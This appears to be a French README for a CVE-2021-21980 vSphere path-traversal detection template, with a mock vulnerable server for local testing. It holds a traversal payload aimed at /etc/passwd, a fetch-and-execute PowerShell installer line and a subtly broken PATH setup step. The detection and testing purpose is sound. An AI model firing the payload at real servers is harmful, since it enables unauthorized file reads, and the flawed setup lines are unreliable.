
CVE-2021-21980
Ce dépôt contient un modèle Nuclei très fiable pour détecter CVE-2021-21980 (traversée de chemin de vSphere Web Client) et un petit environnement simulé qui reproduit le comportement vulnérable pour des tests locaux en toute sécurité.
Fichiers :
cve-2021-21980.yaml : modèle Nuclei avec plusieurs variantes d'encodage et matchersapp.py : une petite application Flask simulant la vulnérabilité de traversée de chemin /eam/vibDockerfile : image de conteneur pour le serveur simulé avec un certificat TLS auto-signédocker-compose.yml : exécute le serveur simulé en écoute sur l'hôte 8443requirements.txt : dépendances Pythoncd C:\Users\gui\Documents\hi
docker-compose up --build -d
Le serveur simulé écoutera sur https://localhost:8443 (certificat TLS auto-signé).
curl -k "https://localhost:8443/" # should return VMware vSphere Web Client (mock)
curl -k "https://localhost:8443/eam/vib?id=../../../../../../../../../../etc/passwd"
Vous devriez recevoir le contenu du fichier simulé /app/sensitive/passwd-mock.
nuclei -t cve-2021-21980.yaml -u https://localhost:8443 -insecure
Si vous souhaitez tester de nombreuses variantes d'encodage, configurez le modèle Nuclei pour qu'il s'exécute avec une verbosité élevée.
Exécute run_local_test.ps1 qui construit, attend que le service soit prêt et exécute les vérifications curl, ainsi que Nuclei si disponible.
powershell -ExecutionPolicy Bypass -File .\run_local_test.ps1
Installer Nuclei sur Windows (rapide) :
iwr -useb get.scoop.sh | iex
scoop install coreutils
scoop install nuclei
Invoke-WebRequest -Uri https://github.com/projectdiscovery/nuclei/releases/latest/download/nuclei_windows_amd64.zip -OutFile nuclei.zip
Expand-Archive -Path nuclei.zip -DestinationPath .\nuclei
Add-Content -Path $PROFILE -Value 'set PATH=$Env:PATH;$(Resolve-Path .\nuclei)'
Sécurité : ayez toujours une autorisation explicite avant de scanner ou d'exploiter des systèmes.
Si nuclei n'est pas dans le PATH, run_local_test.ps1 s'exécutera uniquement jusqu'aux tests curl.
Si vous rencontrez un problème lors de la construction de l'image Docker, assurez-vous que Docker Desktop est installé et que l'option 'Use the WSL 2 based engine' est activée.
/etc/passwd ou un fichier similaire sera renvoyé si le serveur est vulnérable.